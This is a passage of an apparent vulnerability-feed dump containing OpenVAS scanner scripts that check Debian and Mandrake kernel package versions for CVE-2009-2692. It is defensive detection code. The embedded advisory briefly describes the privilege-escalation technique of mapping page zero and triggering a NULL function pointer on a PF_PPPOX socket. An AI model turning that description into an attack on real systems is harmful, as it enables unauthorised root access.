isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-common\", 
ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-alpha-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-generic\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-alpha-legacy\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-amd64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-amd64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-parisc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-hppa\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-parisc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-486\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-i386\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-686-bigmem\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-686\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += 
res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-mckinley\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-itanium\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-ia64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r4k-ip22\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r4k-ip22\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-5kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sb1a-bcm91480b\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-4kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-mips\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r5k-ip32\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-4kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r5k-ip32\", ver:\"2.6.24-6~etchnhalf.8etch3\", 
rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-5kc-malta\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sb1-bcm91250a\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sb1a-bcm91480b\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sb1-bcm91250a\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-r5k-cobalt\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-r5k-cobalt\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-mipsel\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-powerpc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-powerpc-miboot\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-powerpc-miboot\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-s390x\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390x\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-s390\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-s390-tape\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-s390\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-all-sparc\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sparc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-2.6.24-etchnhalf.1-sparc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) 
{\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sparc64\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-2.6.24-etchnhalf.1-sparc64-smp\", ver:\"2.6.24-6~etchnhalf.8etch3\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:52", "description": "The remote host is missing an update to kernel\nannounced via advisory MDVSA-2009:233.", "cvss3": {}, "published": "2009-09-21T00:00:00", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:233 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-2692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064906", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064906", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_233.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:233 (kernel)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A vulnerability was discovered and corrected in the Linux 2.6 kernel:\n\nThe Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4,\ndoes not initialize all function pointers for socket operations\nin proto_ops structures, which allows local users to trigger a NULL\npointer dereference and gain privileges by using mmap to map page zero,\nplacing arbitrary code on this page, and then invoking an unavailable\noperation, as demonstrated by the sendpage operation on a PF_PPPOX\nsocket. (CVE-2009-2692)\n\nTo update your kernel, please follow the directions located at:\n\nhttp://www.mandriva.com/en/security/kernelupdate\n\nAffected: 2008.1, Corporate 3.0, Corporate 4.0,\n Multi Network Firewall 2.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. 
The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:233\";\ntag_summary = \"The remote host is missing an update to kernel\nannounced via advisory MDVSA-2009:233.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64906\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-21 23:13:00 +0200 (Mon, 21 Sep 2009)\");\n script_cve_id(\"CVE-2009-2692\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:233 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel-2.6.24.7-3mnb\", rpm:\"kernel-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop-2.6.24.7-3mnb\", rpm:\"kernel-desktop-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-desktop586-2.6.24.7-3mnb\", rpm:\"kernel-desktop586-2.6.24.7-3mnb~1~1mnb1\", rls:\"MNDK_2008.1\")) != NULL) {\n report 